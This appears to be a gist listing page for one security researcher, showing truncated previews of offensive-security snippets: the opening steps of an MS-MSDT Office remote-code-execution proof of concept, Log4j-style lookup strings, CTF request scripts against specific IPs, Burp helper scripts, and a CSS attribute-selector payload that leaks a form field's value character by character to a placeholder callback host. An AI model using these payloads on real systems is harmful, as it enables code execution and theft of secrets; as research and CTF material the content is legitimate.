abdilahrf

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

abdilahrf

${ctx:loginId}
${map:type}
${filename}
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}

abdilahrf

import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re

# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. 
# python burplist.py burprequests.xml
# output is saved to wordlist.txt

abdilahrf

import requests
import re

url = "http://88.198.233.174:33534/index.php"
payload = {
	"username":"",
	"password":"x",
}

def check(data):

abdilahrf

input[name$=code_1][value^=a]{background-image: url(https://callback.yourdomain.com/callback?token=a&id=CODE_1);}
input[name$=code_1][value^=b]{background-image: url(https://callback.yourdomain.com/callback?token=b&id=CODE_1);}
input[name$=code_1][value^=c]{background-image: url(https://callback.yourdomain.com/callback?token=c&id=CODE_1);}
input[name$=code_1][value^=d]{background-image: url(https://callback.yourdomain.com/callback?token=d&id=CODE_1);}
input[name$=code_1][value^=e]{background-image: url(https://callback.yourdomain.com/callback?token=e&id=CODE_1);}
input[name$=code_1][value^=f]{background-image: url(https://callback.yourdomain.com/callback?token=f&id=CODE_1);}
input[name$=code_1][value^=g]{background-image: url(https://callback.yourdomain.com/callback?token=g&id=CODE_1);}
input[name$=code_1][value^=h]{background-image: url(https://callback.yourdomain.com/callback?token=h&id=CODE_1);}
input[name$=code_1][value^=i]{background-image: url(https://callback.yourdomain.com/callback?token=i&id=CODE_1);

abdilahrf

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)

abdilahrf

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)

abdilahrf

#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com 
#

OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'

abdilahrf

import requests
import re
from StringIO import StringIO
from pycurl import *
import os
import pickle

url = "http://103.56.207.107:50001/upload.php"

payload = {

abdilahrf

from burp import IBurpExtender
from burp import IHttpListener
from burp import IProxyListener
from burp import IScannerListener
from burp import IExtensionStateListener
from java.io import PrintWriter
from burp import IParameter
import datetime
import hashlib